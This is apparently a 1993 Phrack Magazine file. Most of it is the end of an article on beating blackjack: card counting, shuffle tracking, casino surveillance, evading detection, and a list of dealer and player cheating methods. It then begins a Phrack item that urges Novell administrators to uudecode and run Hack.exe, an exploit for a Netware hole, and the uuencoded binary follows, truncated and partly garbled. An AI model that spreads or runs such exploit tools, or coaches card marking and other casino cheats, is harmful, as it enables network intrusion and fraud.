current running and/or true count. For one deck, alter your wager according to the following table: BET UNITS +/- Running Count ----------------------------- 1 +1 or less 2 +2 or +3 3 +4 or +5 4 +6 or +7 5 +8 or more Example: After the first hand of a one deck game, the point count is plus four and you just bet a $5.00 chip. Before the next hand is dealt, wager $15.00 (three units of $5.00) as the above table mandates. What if there are four, six, or more decks instead of just one? I recommend that you perform a "true-count" rather than trying to remember different betting strategies for different number of deck games. By doing a true count, the above table can still be used. The True Count is found by the ensuing equation. I provide an example along with it for the case of having a running count of +9 with one and a half decks left unplayed. It doesn't matter how many decks are used, you just have to have a good eye at guesstimating the number of decks that are left in the shoe. I just measured the thickness of a deck of cards to be 5/8 (10/16) of an inch. Hence the thickness of a half deck is 5/16 of an inch. One and a half decks would be 10/16 + 10/16 + 5/16 = 25/16 or a little over an inch and a half. You probably see a relationship here. The number of decks is approximately equal to the height of the cards in inches. Easy. Running Count +9 True Count = ---------------------- = ----- = +6 # of Decks Remaining 1.5 Looking at the table of betting units above, the proper wager would be four units. If you have trouble keeping the count straight in your head, you can use your chips as a memory storage device. After every hand tally up the net count and update the running or true count by rearranging your chips. This is somewhat conspicuous however, and if done blatantly, may get you labeled a counter. If for some reason you despise the notion of counting cards, you may want to pick up Reference [11], "Winning Without Counting". The author writes about using kinesics (body language) to help determine what the dealers' hole card is after checking for a Natural. He claims that certain dealers have certain habits as far as body language is concerned, especially when they check to see if they have a BlackJack. The dealer will check the hole card if he/she has a ten value card or an Ace as the up-card. When the hand is over you will see what the hole card really was. You may be able to discern a certain characteristic about the dealer, such as a raising of the eyebrows whenever the hole card is a 2-9 or perhaps a slight frown, etc. There is some usefulness to this method but I wouldn't rely on it very much at all. I have only used it for one particular situation. That being when the dealer has a ten up card and checks to see if the hole card is an Ace. Note that many dealers check the hole card very quickly and turn up just the corner of the card so as to prevent any of the players from seeing the card. If the hole card is an Ace, the dealer will turn over the card and declare a BlackJack. However, if the hole card is a 4, many times the dealer will double check it. The reason for this double take is simply that a 4 looks like an Ace from the corner, get a deck of cards and see for yourself. A 4 really looks like an Ace and vice-versa when the corner is checked in a QUICK motion. So, if you see the dealer double check the hole card and NOT declare a BlackJack, you can be fairly sure the hold card is a four, giving the dealer a total of 14. You can now adjust your basic strategy play accordingly. This situation has only come up a few times in my case, but once was when I had a $50.00 bet riding on the hand and I won the hand by using that additional information. Dr. Julian Braun has previously calculated that the player has about a 10% advantage over the house should he/she know what the dealer's hole card is. This is quite substantial. Of course you have to memorize a specific Basic Strategy chart for the case of knowing what the dealers' total is in order to obtain the maximum benefit. I haven't bothered memorizing this chart simply because it is a rare occurrence to know what the dealers' hole card is. If you sit down at a table with an inexperienced dealer, you might catch a couple more than usual, but I don't think it is enough to warrant the extra work unless you want to turn pro. Another thing Winning Without Counting mentions is to pay attention to the arches and warps in the cards. Perhaps a lot of the ten value cards have a particular warp in them due to all those times the dealer checked for a BlackJack. The author claims that he has used this to his advantage. Maybe so, but I don't put much stock in this technique. I have enough things to worry about while playing. One last thing. There is no law or rule that says a dealer cannot count cards. A dealer may count cards because he or she is bored but more likely is that the casino may encourage counting. The reason being that if the deck is favorable to the player, the house can know this and "shuffle up". This is also called preferential shuffling (a game control measure) and it vaporizes your advantage. Shuffle Tracking: ----------------- Shuffle What? Shuffle Tracking. This is a fairly new (15 years +/-) technique that has not been publicized very much. One problem with many of the BlackJack books out there is that they are not hip to the current game. The obvious reason for this is that many are old or simply re-formulate strategies that were invented decades ago. It's just like reading "How to Hack the Primos Version 18 Operating System" today. The file may be interesting, many of the commands may be the same, but it doesn't detail how to take advantage of, and subvert the CURRENT version of the OS. The best definition I have seen is this one quoted from Reference [5]: "'Shuffle-tracking' is the science of following specific cards through the shuffling process for the purpose of either keeping them in play or cutting them out of play." The concept of Shuffle tracking appears to have resulted from bored mathematician's research and computer simulation of shuffling cards, a familiar theme to BlackJack you say. The main thing that I hope every reader gets from this section is that just because someone shuffles a deck (or decks) of cards does not in any way mean that the cards are "randomized". The methods mentioned in the two previous sections (Basic Strategy and Card Counting) ASSUME A RANDOM DISTRIBUTION OF CARDS! That is an important point. According to some authors, a single deck of cards must be shuffled twenty to thirty times to ensure a truly random dispersion. If a Casino is using a 6 deck shoe, that's 120 to 180 shuffles! Obviously they aren't going to shuffle anywhere near that many times. But don't despair, there are some types of shuffles which are good, and some that are bad. In fact, if the cards were always randomly disbursed, then you would not be reading this section due to it's lack of relevance. As in the Card Counting section, I am going to restrict the discussion to the basics of shuffle tracking as the combination of references listed at the end of this section provide a complete discourse of the topic. A beneficial (to the player) shuffle for a one deck game is executed by dividing the deck equally into 26 cards and shuffling them together a minimum of three times. This allows the cards to be sufficiently intermixed to yield a fairly random distribution. An adverse shuffle prevents the cards from mixing completely. The simplest example is the Unbalanced Shuffle. As its name implies, the dealer breaks the deck into two unequal stacks. As an example, lets say you are playing two hands head on with the dealer and the last 10 cards in the deck are dealt. The result of the hand was that both your hands lost to the dealer primarily due to the high percentage of low value cards in the clump. Note that if you were counting, you would have bet a single unit since the deck was unfavorable. The dealer is now ready to shuffle the deck, and separates the deck into 31 cards in one stack and 21 in the other stack. The dealer shuffles the two stacks. If the shuffle is done from the bottom of each stack on up, the top ten cards of the larger stack will remain intact without mixing with any of the other cards. Those ten cards can remain in the order they were just dealt throughout the shuffle if the process of bottom to top shuffling is not altered. You are now asked to cut the deck. If you don't cut the deck, the 10 cards that were dealt last hand will be dealt as your first two hands. The result will be the same as your last and you will lose the two hands. However, if you cut the deck exactly at the end of those ten cards, you have just altered the future to your benefit. Those cards will now be placed at the bottom of the deck. Should the dealer shuffle up early, you will avoid them altogether. In addition, if you were keeping count, you would know that the deck was favorable during the first 3-4 hands since there would be an abundance of tens in the portion of the deck that will be played. You would accordingly increase you bet size to maximize your winnings. Some dealers will unknowingly split the deck into unequal stacks. However, more often than not, they are REQUIRED to split the deck into unequal stacks. If they are required to do this, they are performing the House Shuffle. The casino has trained the dealer to shuffle a particular way...on purpose! Why? Because in the long run, the house will benefit from this because most players will not cut any bad clumps out of play. If you have played BlackJack in a casino, how much did you pay attention to the way they shuffled? Like most people you were probably oblivious to it, perhaps you figured that during the shuffle would be a good time to ask that hot waitress for another drink. Regardless, you now see that it may be a good idea to pay attention during the shuffle instead of that set of "big breastseses" as David Allen Grier says on the "In Living Color" TV show ;)-8-< There are a number of shuffle methods, some of which have been labeled as: the "Zone Shuffle", the "Strip Shuffle", and the "Stutter Shuffle". The Zone Shuffle is particular to shoe games (multiple deck games) and is probably one of the most common shuffle methods which is why I mention it here. It is accomplished by splitting the shoe into 4 to 8 piles depending on the number of decks in the shoe. Prescribed picks from each pile are made in a very exact way with intermittent shuffles of each pair of half deck sized stacks. The net effect is a simple regrouping of the cards pretty much in the same region of the shoe as they were before, thereby preventing clumps of cards from being randomly mixed. If the dealer won 40 hands and you won 20, this trend is likely to continue until you are broke or until the unfavorable bias is removed through many shuffles. What if the players are winning the 40 hands and the dealer only 20? If the dealer has been mentally keeping track of how many hands each side has won in the shoe, the dealer will probably do one of two things. One is to keep the shuffle the same, but 'strip' the deck. When a dealer strips a deck, he/she strips off one card at a time from the shoe letting them fall on top of one another onto the table. This action causes the order of the cards to be reversed. The main consequence is to dissipate any clumping advantages (a bunch of tens in a clump) that the players may have. The second thing the dealer may do is simply change the way they shuffle to help randomize the cards. I personally believe that casinos use certain shuffles on purpose for the sole reason that they gain some sort of advantage. A BlackJack dealer friend of mine disputes the whole theory of card clumping and shuffle tracking though. The mathematics and simulation prove the non-random nature of certain shuffles under controlled conditions. Perhaps in an actual casino environment the effect isn't as high. Regardless, next time you are playing in a casino and its time to shuffle a shoe, ask the dealer to CHANGE they WAY he/she shuffles. The answer will nearly always be NO. Try to appeal to the pit boss and he/she will probably mumble something about casino policy. Why are they afraid to change the shuffle? Relevant Reading: [4], [5] Chapters 5 and 6 pages 71 to 98, [14] pages 463 to 466, and [15] which is very detailed and accessible via Internet FTP. Casino Security and Surveillance: -------------------------------- I figured this section might get some people's attention. It is important to know what the casino is capable of as far as detecting cheating (by employees and customers) and spotting card counters. EYE IN THE SKY: A two way mirror in the ceiling of the casino. It's not hard to spot in older casinos as it usually is very long. Before 1973 or so, employees traversed catwalks in the ceiling and it was easy for dealers and players to hear when they were being watched. Sometimes dust from the ceiling would settle down onto a table when someone was above it. Newer casinos use those big dark plexiglass bubbles with video camera's which should be watched constantly. These cameras have awesome Z00M capabilities and according to Reference [9], the cameras can read the word "liberty" on a penny placed on a BlackJack table. I am sure the resolution is better than that for the latest equipment. The video images are also taped for use as evidence should anything that is suspect be detected. Just like computer security audit logs, if no one pays attention to them, they don't do much good. If you want a job monitoring gamblers and casino employees, you need to train for about 500 hours (about twenty 40 hour weeks) to learn all the tricks people try to pull on you. Pretty intensive program wouldn't you say? CASINO EMPLOYEES: Then there are the casino employees. The dealers watch the players, the floor men watch the dealers and the players, the pitbosses watch the dealers, the floormen, and the players, etc. There may be plain clothes detectives roaming about. In a casino, everyone is suspect. BLACK BOOK: A company that you will see mentioned in a lot of casino books is Griffin Investigations. They periodically update a book that casino's subscribe to that have pictures and related info on barred card counters and known casino cheats.....I suppose the "black book" as it is called, is analogous to the "Bell security hit-lists", that had (have?) files on known phreaks and hackers. Social Engineering the Casino: ------------------------------ If you are good at getting an ESS operator to enter NET-LINE on DN COE-XXXX, and at getting those "Engineering Resistant Hard Asses up at SNET (Southern New England Telephone)" [as The Marauder affectionately calls them] to give you the new CRSAB number; then this section will be a piece of cake for you to master. References [3], [7], and [8] have many stories regarding playing in casinos, getting barred, and various exploits. I am not going to repeat any of them here. In each of those books, the authors talk about their first experiences getting barred. In each case they were fairly bewildered as to why they were kicked out, at least until some casino employee or owner told them things like "you're just too good" and the ever diplomatic: "we know your kind, get the hell out!". As you probably have gathered thus far, card counters are as undesirable in a casino as a phone phreak is in a central office. There are a number of behavioral characteristics which have been attributed to the 'typical' card counter. Probably the most obvious act of a counter is a large increase in bet size. If you recall in the Card Counting section, when the deck is favorable, you bet more. When the deck is unfavorable, you bet less. Dr. Thorp's original system required a variation in bet size from one to ten units. When the deck is favorable the system may dictate that you go from a ten dollar bet to a hundred dollar bet. Kind of gets the attention of the dealer and the pit boss. However, this type of wild wagering is typical of big money hunch bettors. Hunch betters will just plop down a bunch of chips at random due to 'hunches'. Therefore, a large increase in bet size won't necessarily cause you to be pegged as a counter. Intense concentration, never taking your eyes off the cards, lack of emotion...ie, playing like a computer, is pretty much a give away that you are counting. Other things such as 'acting suspicious', meticulously stacking your chips, betting in discernable patterns, and a devout abstention from alcohol may also attract unwanted attention. Another criteria used for spotting counters is if there are two or more people playing in concert with one another. Ken Uston is famous for his BlackJack teams. They have literally won millions of dollars collectively. When the "Team-LOD" gets together to play, we have to pretend we don't know each other so as not to attract undue attention ;-) What I mean by Social Engineering the casino is to list ways that trick the casino into thinking you are just a dumb tourist who is throwing money away. Look around, smile, act unconcerned about your bet, don't be afraid to talk to the dealer, floorperson, or pit boss. Don't play 8 hours straight. Perhaps order a drink. Things of this nature will help deflect suspicion. I only recall attracting attention once. The casino wasn't very busy, there were 3 people at the table including myself. I only had about an hour to play so I bet aggressively. I started with $5 and $10 but made some $50.00 bets whenever I got a feeling that I was going to win the next hand (quite the scientific strategy I know). A woman next to me who seemed to be a fairly seasoned player made a comment that I was a little too aggressive. The pit boss hovered about the table. My hour was nearly up, I bet $10.00 for the dealer and $50.00 for myself. I lost the hand leaving me only $100.00 ahead, and left. The only thing I could think of besides the betting spread which really wasn't a big deal was that the casino was FREEZING inside. I was shivering like hell, it probably looked like I was shaking out of fear of being spotted as a counter or worse...a cheater. So what if a casino thinks you are counter? To be honest, there have probably been less than 1000 people who have been permanently barred from play (ie, they have their mugs in the black book). A far greater number have been asked to leave but were not prevented from returning in the future. Tipping the dealer may not necessarily get the casino off your back but certainly doesn't hurt. When you toke the dealer, place the chip in the corner of your betting box a few inches from your bet. You may want to say "we are in this one together" or some such to make sure they are aware of the tip. This approach is better than just giving them the chip because their 'fate' is tied in with yours. If your hand wins, 99 out of 100 times they will take the tip and the tip's winnings off the table. The 1 out of 100 that the dealer let the tip+win ride happened to me over and over again for the better part of a day. It was a week before I had to go back to college and I was broke, with no money to pay the deposits for rent and utilities. Basically, if I didn't come up with some money in 7 days, I was not going back to school. This was 4 years ago BTW. I took out $150 on my credit card (stupid but hey, I was desperate) and started playing and winning immediately. I pressed my bets time and time again and in an hour or two had $500 in front of me (+$350). I started losing a bit so I took a break for a short while. I went back to a different table with a different dealer. As soon as I sat down I started winning. I started to tip red chips ($5.00) for the dealer. The first couple of times he took the $10.00 right away. I kept winning steadily and continued to toke him. Then he started to let the $10.00 ride! I was amazed because I had never seen that before. That is when I knew I was HOT. If the dealer is betting on you to win, that says something. When I stopped playing I cashed in eight black chips. I left with eight one hundred dollar bills, a net profit of $650.00, just enough to cover everything. Whew! I probably tipped close to $100.00 that day, and the dealer must have made double to triple that due to him betting with me. There were a number of times when the pit boss wasn't close that the dealer would IGNORE my hit or stand signal. The first time he did this I repeated myself and he did what I asked but gave me a 'look'. Needless to say, I lost the hand. After that, if he 'thought' I said stand, I didn't argue. This occurred when he had a ten as the up-card so he knew his total from peeking at the hole card. I am not sure if this is considered cheating because I did not ask him to do this, nor did we conspire. It just happened a few times, usually when I had $25-$50 bets on the line which is when I made sure to throw in a red chip for him. Casino Cheating and Player Cheating: ------------------------------------ Cheating by the house is rare in the major casinos ie, those located in Nevada and Atlantic City. The Nevada Gaming Commission may revoke a casino's gambling license if a casino is caught cheating players. Granted, there may be a few employees (dealers, boxmen, whomever) that may cheat players, but it is extremely doubtful any casino in Nevada or Atlantic City does so on a casino-wide scale. You definitely should be wary of any casino that is not regulated such as those found on many cruise ships. Because a casino does not have to answer to any regulatory agency does not mean it is cheating players. The fact is that casino's make plenty of money legitimately with the built-in house advantages and don't really need to cheat players to survive. I provide some cheating methods here merely to make you aware of the scams. These techniques are still carried out in crooked underground casinos and private games. The single deck hand-held BlackJack game is quite a bit more susceptible to cheating by both the dealer and the player than games dealt from a shoe. The preferred method of dealer cheating is called the "second deal". As you may infer, this technique requires the card mechanic to pretend to deal the top card but instead deals the card that is immediately under the top card. Imagine if you could draw a low card when you need a low card, and a high card when you need a high card. You could win large sums of money in a very short period. Well, a dealer who has the ability to execute the demanding sleight of hand movements for second dealing can drain even the best BlackJack player's bankroll in short order. If someone is going to deal seconds, they must know what the second card is if he or she is to benefit. One way to determine the second card is by peeking. A mechanic will distract you by pointing or gesticulating with the hand that is holding the deck. "Look! There's Gail Thackeray!". While you are busy looking, the dealer is covertly peeking at the second card. A more risky method is pegging. A device called a pegger is used to put small indentations in the cards that the dealer can feel. Pegging all the ten value cards has obvious benefits. Another method is the "high-low pickup". I like this one because it's easy for a novice to do especially in a place where there are a lot of distractions for the players. After every hand, the dealer picks up the cards in a high-low alternating order. The mechanic then proceeds with the "false shuffle" in which the deck is thought to have been shuffled but in reality the cards remain in the same order as before the shuffle. As you well know by now, a high-low-high-low arrangement of the cards would be death to the BlackJack player. Get dealt a ten and then a 5, you have to hit, so get another ten. Busted. Since the dealer doesn't lose until he/she busts, all the players who bust before lose. Bottom dealing and switching hole cards are other techniques that may be used to cheat players. For shoe games, there is a device called a "holdout shoe" that essentially second deals for the dealer. Discreet mirrors and prisms may be contained in the holdout shoe which only allow the dealer to see what card is next. Shorting a regular shoe of ten cards will obviously have a detrimental effect on the BlackJack player. Player cheating isn't recommended. However, I'll quickly list some of the methods for awareness purposes. The old stand-by of going up to a table, grabbing some chips, and running like hell is still done but certainly lacks originality. Marking cards while you play is another popular method. "The Daub" technique is done by clandestinely applying a substance that leaves an almost invisible smudge on the card. High value cards like tens are usually the targets. One scam mentioned in one of the references was the use of a special paint that was only visible to specially made contact lenses. The "hold out" method requires the palming of a card and substituting a better one. This is usually done when there is big money bet on the hand. One of the risks to these methods is when the deck is changed since the pit boss always scrutinizes the decks after they are taken out of play. Other methods entail playing two hands and switching cards from one hand to the other, counterfeiting cards and/or casino chips, adding chips after a winning hand (I have seen this done twice, couldn't believe my eyes but certainly wasn't going to RAT the thieves out). Some dealers may be careless when looking at their hole card for a BlackJack. A person behind the dealer on the other side of the pit may be able to discern the card. The value is then signalled to a player at the table. Astute pit bosses may notice someone who is not playing that scratches their head too much though. Wireless signalling devices have been used for various purposes but some casinos have new electronic detection systems that monitor certain frequencies for activity. Some Comments Regarding Computer BlackJack Software for PC's: --------------------------------------------------------------- I strongly recommend that you practice using a BlackJack program of some kind before going out to play with real cash. The first program I used for 'training' some years ago was "Ken Uston's BlackJack" on my old Apple ][+. Later I acquired "Beat The House" for the same machine. I recently bought a program for my IBM and have been using it to refresh my memory regarding basic strategy, card counting, and money management techniques. I assume you will recognize the guy's name in the title now that you have read most of this article. I bought: "Dr. Thorp's Mini BlackJack" by Villa Crespo Software at a Wal-Mart of all places for a measly $7.88. This is an abridged version however. Villa Crespo charges $12.95 for it if you order via mail. They also offer an unabridged version for $29.95 via mail. Villa Crespo (don't ask me where they got that name) offers other programs for Craps, Video Poker, and 7-Card Stud in case you are interested in those games of chance. By the way, on the order form I also noticed "FAILSAFE Computer Guardian (Complete protection and security for your system)" for $59.95. For some reason any time a piece of paper has the word 'security' on it, my eyes zero in on it.... Some features that I liked about this scaled down version of their BlackJack program were the TUTOR, which advises you on whether to hit, stand, take insurance (no way), etc. as per Basic Strategy. The Tutor for the abridged version does NOT take into consideration the card count when making recommendations though. If you are counting the cards, the program keeps count also, so if you lose count you can check it by pressing a function key. The STATS option is neat since it keeps track of things such as how many hands were dealt, how many you won/lost, etc. and can be printed out so you can track your progress. The program allows you to save your current session in case you get the urge to dial up the Internet to check your email, something that should be done every hour on the hour.... One thing I did not like about the program was that it allowed you to bet over your bankroll. I accidentally pushed [F2] (standardized at $500.00 a bet instead of [F1] (standardized at $5.00 a bet) ---- a slight difference in wager I'd say. Having only $272.00 in my bankroll didn't stop the program from executing the command and in my opinion it should have prevented the overdraft. The first time I played Dr. Thorp's Mini BlackJack, it took me about 95 hands to double my money. I started with $200.00, bet from $5.00 to $25.00, never dropped below $180.00 which surprised me, and received 3 BlackJacks. I won 63 hands, and lost 32. I played head on against the dealer, although the program allows for up to 6 players. I consider that lucky since I had my fair share of going broke in later sessions. My advice when using a BlackJack computer program is: do not start with a bizzillion dollars or anything like that. Start with the amount that you truly plan to use when you sit down at an actual table. If you play in a crowded casino, all the low minimum bet tables (ie: $1.00 to $5.00) will most likely be filled to capacity and only $10.00 or $15.00 tables will have openings. Keep this in mind because when you make bets with the computer program, you should wager no less than whatever the minimum will be at the table you sit down at. If your bankroll is only $200.00 playing at anything more than a $5.00 minimum table is pushing it. Another thing to note is that playing at home is kind of like watching Jeopardy on TV while you are sitting on the couch. People who have been on the show always say it was much harder than when they blurted out answers during dinner with their mouths full (the Heimlich maneuver--a real lifesaver!). The same thing goes for BlackJack. When you are sitting at an actual table, your adrenaline is flowing, your heart starts to pump faster, you make irrational plays especially when you start losing, and odds are you will forget things that were memorized perfectly. There is no substitute for the real thing and real experience. Quick Comments on Other Casino Games: ------------------------------------- A few people suggested I briefly mention some of the other casino games so I added this section. I don't go into much detail at all as this file is too unwieldy already. Besides, if you want to know more, I am sure you'll pick up the appropriate reference. Hundreds of books have been published on gambling and they are available by contacting [2]. My aim here was to mention details that most people may not be aware of. BACCARAT: This is the game you see in movies a lot. See [12]'s FAQ for a good explanation of this game. CRAPS: Craps is probably the most complicated casino game as far as the different ways to bet things are concerned but its really not that hard to learn. I just want to throw one table at you adapted from Reference [13]. The table won't make much sense unless you are already familiar with craps. In case you have forgotten or didn't know, craps is 'that dice game'. The purpose of presenting it is to save you $$$$$ <-- Still love that dollar sign key! hehe Lamest Bets at the Craps Table BET PAYS SHOULD PAY YOUR ADVANTAGE ------------------------------------------------------- Any-7 4 to 1 5 to 1 -16.7 % 2 (or 12) 30 to 1 35 to 1 -13.9 % Hard 10 (or 4) 7 to 1 8 to 1 -11.1 % 3 (or 11) 15 to 1 17 to 1 -11.1 % Any Craps 37 to 1 8 to 1 -11.1 % Hard 6 (or 8) 9 to 1 10 to 1 -9.1 % SLOTS: Playing slots is a gamble. Obviously you say. No, I mean its a gamble to play them. House advantages are almost never displayed on a particular slot machine. Different machines and different locations may have different casino win percentages. When you go up to a slot machine, you have no idea if its' advantage over you is 5% or 25%. Unless you have been watching it, you don't know if it just paid off a big jackpot either. I don't play slots as a matter of principle. If you do play I think there are still some $.05 slots in Vegas. Play the nickel slots and keep your shirt, especially if its an LOD T-shirt. VIDEO POKER: Reference [13] gives the following advice regarding video poker: "...don't expect to win. Manage your money so that you limit your losses." I think its a bit negative but I can't argue with the logic. Also, as with slots, you may want to play at a machine that is networked with others which has a progressive payoff. This way at least you have a chance of making the big bucks in addition to those periodic small payoffs. VIDEO BLACKJACK: If you like to avoid people and like BlackJack, you may be thinking that this is a great way for you to "hack two systems with one password" and make a little money on the side. Before you start putting quarter or dollar tokens into video BlackJack machines there are a couple of things to know. First, you can't use card counting techniques because every hand is essentially dealt from a new deck. When the computer deals a hand it is just providing 'random' cards. Perhaps if you saw the source code, you may be able to determine some sort of bias but I suspect it would be minuscule at best. The rules vary from machine to machine and the maximum allowable bet varies also. As with the video poker and video slot machines, the owner of the machine may set the options to their taste (amount of profit). Selected Bibliography: ---------------------- The following are some references you may want to check out and some of my sources of information for this article. They are not in any particular order and the format is far from standard as opposed to my thesis bibliography :) [1] "BlackJack Forum Newsletter" by RGE Publishing in Oakland California. This is a quarterly publication which has the location and rule variations info (among other things) for casinos in the state of Nevada. [2] The Gamblers Book Club (its really a store) can sell you a sample of the BlackJack Forum Newsletter for $10.00. They have all kinds of new and out of print books, used magazines, etc. They are located in Vegas (630 S. 11th St.) so stop by in person or call 1-800-634-6243 which was valid as of 6/1/93 since I just gave them a ring...the guy I spoke to was very nice and helpful so I thought I'd give them a plug here. [3] "Beat The Dealer" by Dr. Edward O. Thorp. Make sure you get the SECOND edition (1966) since it has Dr. Julian Braun's additions to the original 1962 edition. [4] "Gambling Times Magazine" (now defunct), 'BlackJack Bias Part 1 and 2' July and August 1987 Issues by Mason Malmuth. This magazine was great because it kept you up to date on the latest in gambling systems and what casinos are up to. The article is about the author using his PC to perform simulations regarding the effects of non-random card distribution on BlackJack. [5] "Break The Dealer" by Jerry L. Patterson and Eddie Olsen, 1986 Perigee Books. Worth the money for the chapters on Shuffle Tracking alone. [6] "The Optimum Strategy in BlackJack" by Roger R. Baldwin, Wilbert E. Cantey, Herbert Maisel, James P. McDermott. Journal of the American Statistical Association, September 1956. Eight of ten pages are mathematics. [7] "The World's Greatest BlackJack Book" revised edition (1987) by Dr. Lance Humble and Dr. Carl Cooper, Doubleday. I am not sure it is THE world's greatest, but it is an excellent book. It is 400 pages and provides more details than you probably care to know about the Hi-Opt I counting system. [8] "Turning the Tables on Las Vegas" by Ian Anderson, 1978. This is an excellent book if you were interested in The Social Engineering the Casino section. The author shares a lot of interesting and funny stories that can keep you from getting barred. Note that 'Ian Anderson' is the authors' handle. [9] "Las Vegas, Behind the Tables" by Barney Vinson, 1986, Gollehon Press. Written by a casino executive, I found it to be quite illuminating. [10] "Gambling Scams" by Darwin Ortiz, 1990, Carrol Publishing. If you play in any private games, be sure to read this one to avoid getting screwed. It even has a section on crooked carnival games. [11] "Winning Without Counting" by Stanford Wong. This book has an interesting section on 'Dealer Tells' and how to exploit them. [12] "Rec.Gambling" Internet USENET Newsgroup. The rec.gambling newsgroup is an excellent free source of current information on BlackJack and other games. People who have just gotten back from various casinos post about their playing results and the treatment from casinos. One person just posted that he was barred from playing BlackJack (a casino employee told him he could play any game in the casino EXCEPT BlackJack) after he was ahead only $40.00. The reason apparently was due to his fairly mechanical play and betting. The rec.gambling FAQ was message #15912 when I read the newsgroup on 6/8/93. They plan on posting the FAQ every month or so. I found the FAQ to be very informative. There is an alt.gambling newsgroup but it is dead with 0 messages. [13] "The Winner's Guide to Casino Gambling", revised edition by Edwin Silberstang, 1989 Plume printing. This book covers a wide range of casino games and has a large list of gambling terms in the back. [14] "Gambling and Society" edited by William R. Eadington, 1976. This book provides plenty of information on the psychology of gambling. I found the section on 'Who Wants to be a Professional Gambler?' interesting as the study indicates the types of vocations that show high correlations with being a professional gambler. One of those vocations with an 'extremely high correlation' was being a Secret Service agent. Maybe Agent Foley will change jobs.....he can't do much worse, ahem. Chapter 24 by James N. Hanson is entitled "Nonlinear Programming Simulation and Gambling Theory Applied to BlackJack" which some of you programmers might be interested in. [15] "The BlackJack Shuffle-Tracking Treatise" by Michael R. Hall accessible via the Internet by anonymous FTP: soda.berkeley.edu in the pub/rec.gambling/blackjack directory. This is a very detailed 78K file that was well done. It provides plenty of the nitty-gritty details that I did not have the space to mention in this article. I highly recommend it. [16] "Risk of Ruin" by Michael R. Hall available from same source as [15] above. This paper provides some mathematical formulas for helping you determine the likelihood of losing portions of your starting bankroll. Although the equations look complicated, anyone with a $10. scientific calculator can use them. The author provides source code for a program written in C that calculates the risk formula. Also get his "Optimal Wagering" file which helps you determine your bet size. [17] The movie: "Fever Pitch" starring Ryan 'O Niel. This is the most realistic movie I have seen regarding the psychology of a gambler. If I recall correctly, it was made in 1985 and is in most video rental stores. Final Comments: --------------- Let me quickly thank those who took the hour to read my article, recommended corrections and offered their insightful comments: The Marauder, Mark Tabas, Professor Falken, Al Capone, Jester Sluggo, and Bruce Sterling. Also, I would like to thank JLE, my 'gambling mentor' mentioned earlier even though he doesn't know me as 'lex' and probably will never see this file. If anyone has comments, corrections, etc. feel free to email me. Kindly note that I have no interest in receiving flames from any self professed BlackJack experts out there as I do not claim to be an expert and due to size restrictions, I couldn't get all that complicated regarding counting techniques and such. Besides, anyone who wants to get serious will take the time to thoroughly read the references listed in the previous section. My main purpose was to familiarize you with the game of BlackJack and provide a resource which can point you in the right direction for more in-depth information. Thank you for your time and I hope you learned something from this article even if you don't put any of the information to use. If you have something really SEKRET to tell me, here is my PGP Public Key: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.2 mQCNAiwEHN4AAAEEAMtDxWI2HYsAQO8QhDBYhHvmn3fzGpKFbimxl34XiQ5woU/K lqbD53ahfnB9ST22yxEvexXW0VGVVfSp9xiUl7d7RsTm7Uas3OaOOiSFIRCVvcG8 FnWARH0nmELBXYkXXjjvjm2BiCEkn45eFaZPX7KbCuIGVjCe3zltpJGBK2OvAAUR tCRMZXggTHV0aG9yIDxsZXhAbWluZHZveC5waGFudG9tLmNvbT4= =LOXY -----END PGP PUBLIC KEY BLOCK----- End of "How To Hack BlackJack": File 2 of 2 ==Phrack Magazine== Volume Four, Issue Forty-Three, File 11 of 27 Help for Verifying Novell Security Provided By Phrack Magazine In nearly a year since their release, the programs Hack.exe and View.exe are still potential threats to the security of Novell Networks. Despite Novell's commendable response with a patch for the holes these programs exposed, many system administrators have not yet implemented the fix. We at Phrack encourage system administrators to uudecode and execute the following programs to determine whether or not their servers are at risk. The patches, SECUREFX.NLM for Netware 3.11, and SECUREFX.VAP for Netware 2.2 are available via Novell's NetWire, or from ftp.novell.com. Users with additional questions about Netware security can call Novell directly at 800-638-9273. ------------------------------------------------------------------------ begin 777 hack.exe M35HA 2L 6 %@ )H __\,!0 (%10Z *@ '@ $ ) #B!"( X@0@ .($'@#B M!!P X@0: .($& #B!!8 X@04 .($$@#B!! X@0. .($# #B! H X@0( .($ M!@#B! 0 X@0" .($ #B!"D" . @ ^ $ .P! #C 0 S0$ + @ &@( M !@" 6 @ $\( T" '@@ !(( )" \P< -T' #$!P O0< M *,' "7!P CP< (<' !_!P 10< !X' (!P 0< / & #H!@ MWP8 'P* !E"@ 7@H "@* 5"@ !@H /() #K"0 UPD +() "@ M"0 B@D '0) ^"0 ,0D !L) / ( "-@" L@ C0*K (T"G0"- G@ MC0)5 (T".P"- BH C0(9 (T""P&= NL G0+" )T"G0"= H4 G0)D )T"20"= M C$ G0(@ )T"? "P E0 L (L + "B@.X DD"N +K ;@"Q &X JL!N *3 ;@" M#0&X O@ N +> +@"6P"X D8 N (L +@"0P>X C4'N (=![@""P>X NT&N +- M!K@"H :X H0&N )Y!K@"4@:X CP&N (,!K@" 0:X NH%N +1!;@"O 6X HP% MN *!!;@":@6X E$%N (\!;@"O 2X MP*N (T"K@"K@FX H4)N )L";@"00FX M A@)N (*";@"VPBX LT(N *U"+@"HPBX H((N )I"+@"/@BX @\(N (!"+@" MZ0>X M<'N *V![@"G0>X G('N (/ &D#*0!M X( = -K '0#5 !T S8 = ,< M 'P#90!^ T\ ?@,Y 'X#(P!^ P\ ?@.P (0#D0"$ W A -3 (0#-@"$ W4 MD@-@ )(#/0"2 R, D@,2 )(#_@": ]0 F@.? )H#E ": W$ F@-0 )H#/P": M RT F@,< )H#9@;S T4 J !E *@ ;0"H +4 J "\ *@ P0"H -P J #B *@ MY0"H /< J #\ *@ _@;S _L!J !T J@ B *H ,X"J #7 J@ -P6H !$&J " M!J@ ;@:H %(&J . .$$-@WS S -\P.8#O,#,0BH P(J #K!Z@ 9P>H %H' MJ !/!Z@ . >H "X'J @!Z@ =@BH &8*J !4"J@ 1PJH #<*J #_":@ S0FH M +H)J "I":@ $@FH 8)J #W"*@ ZPBH ,H*J '"Z@ GP^H (H/J F .($ M>!.H .$2J !U$J@ -Q*H "X6J #1%Z@ _1>H +49J #&#O,#R@[S \X.\P/2 M#O,#U@[S ]$;J M M M 58OLN @ FI0"J !6F@0 9P,*P'0#Z5P*N'8#NJ\#4E"X' "ZKP-2 M4+@& +JO U)0N$(#NJ\#4E":!P" H/$$ O =0/I)PJ.!C /)J!" RKD4+A" M !Y0FC(&J "#Q :.!C(/)J & "KD4+A: !Y0FC(&J "#Q :.!C0/)O\V' "X M<@ >4)HR!J@ 